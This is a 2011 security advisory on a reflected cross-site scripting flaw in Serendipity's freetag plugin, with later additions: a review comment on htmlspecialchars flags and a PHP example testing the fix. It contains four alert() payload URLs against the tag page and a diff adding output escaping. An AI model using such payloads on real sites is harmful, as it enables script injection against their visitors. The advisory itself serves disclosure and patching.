Advisory: Cross-Site Scripting vulnerability in Serendipity Plugin "serendipity_event_freetag"

Advisory ID: SSCHADV2011-004
Author: Stefan Schurtz
Affected Software: Successfully tested on: Serendipity 1.5.5 with serendipity_event_freetag - version 3.21
Vendor URL: http://www.s9y.org
Vendor Status: Version 3.22 - Fix possible XSS
CVE-ID: -

==========================
Vulnerability Description:
==========================

This is a Cross-Site Scripting vulnerability.

==================
Technical Details:
==================

http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(String.fromCharCode(88,83,83))>
http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(String.fromCharCode(88,83,83))>

=========
Solution:
=========

Update to the latest version 3.22

diff serendipity_event_freetag.php

< <?php #$Id: serendipity_event_freetag.php,v 1.148 2011/05/09 08:19:30 garvinhicking Exp $
> <?php #$Id: serendipity_event_freetag.php,v 1.149 2011/05/30 20:25:24 garvinhicking Exp $

< $propbag->add('version', '3.21');
> $propbag->add('version', '3.22');

< $serendipity['smarty']->assign('freetag_tagTitle', is_array($this->displayTag) ? implode(' + ',$this->displayTag) : $this->displayTag);
> $serendipity['smarty']->assign('freetag_tagTitle', htmlspecialchars(is_array($this->displayTag) ? implode(' + ',$this->displayTag) : $this->displayTag));

====================
Disclosure Timeline:
====================

30-May-2011 - informed developers
30-May-2011 - Release date of this security advisory
30-May-2011 - Version 3.22 - Fix possible XSS
31-May-2011 - post on BugTraq and Full-disclosure

========
Credits:
========

Vulnerability found and advisory written by Stefan Schurtz.
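Review bot: in the freetag_tagTitle hunk, htmlspecialchars() is called with its default flags and no charset argument; on PHP releases before 8.1 the defaults encode double quotes but leave single quotes untouched, so a title that is later placed inside a single-quoted attribute would still not be neutralised. Suggest `htmlspecialchars($title, ENT_QUOTES, 'UTF-8')` so the escaping does not depend on the PHP version's defaults or default_charset setting.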
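To show what the 3.22 change does to the advisory's own payload, here is an added example (not code from the plugin or the advisory author) that mirrors the tag-title assignment before and after the fix. The ENT_QUOTES flag and explicit charset are an assumption of this example; the diff itself calls htmlspecialchars() with default flags, and the Smarty template that renders the value is not modelled.

```php
<?php
// Added example, not code from the serendipity_event_freetag plugin: a minimal
// stand-in for the tag-title assignment shown in the advisory's diff, so the
// effect of the 3.22 fix can be checked against the advisory's own payload.

// Tag title as the 3.21 code built it: a (possibly array) displayTag is
// joined with ' + ' and handed to Smarty unchanged.
function tag_title_unescaped($displayTag) {
    return is_array($displayTag) ? implode(' + ', $displayTag) : $displayTag;
}

// Tag title as the 3.22 fix builds it, plus ENT_QUOTES and an explicit charset
// (an assumption of this example; the diff uses htmlspecialchars() defaults,
// which on PHP before 8.1 leave single quotes unencoded).
function tag_title_escaped($displayTag) {
    $title = is_array($displayTag) ? implode(' + ', $displayTag) : $displayTag;
    return htmlspecialchars($title, ENT_QUOTES, 'UTF-8');
}

// Constructed inputs: the advisory's proof-of-concept tag, and an array of
// tags to exercise the implode() branch.
$samples = [
    'hallo=><body onload=alert(666)>',
    ['hallo', "<img src=x onerror='alert(1)'>"],
];

foreach ($samples as $displayTag) {
    $raw  = tag_title_unescaped($displayTag);
    $safe = tag_title_escaped($displayTag);
    // Any raw < > " or ' in the title can terminate the surrounding markup or
    // attribute; after escaping, none of those four characters should remain.
    $leaks = preg_match('/[<>"\']/', $safe) === 1;
    printf("unescaped: %s\n", $raw);
    printf("escaped:   %s\n", $safe);
    printf("markup characters left unescaped: %s\n\n", $leaks ? 'yes' : 'no');
}
```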
===========
References:
===========

http://www.s9y.org
http://blog.s9y.org/archives/231-serendipity_event_freetag-Plugin-update,-XSS-bug.html
http://www.rul3z.de/advisories/SSCHADV2011-004.txt
http://ha.ckers.org/xss.html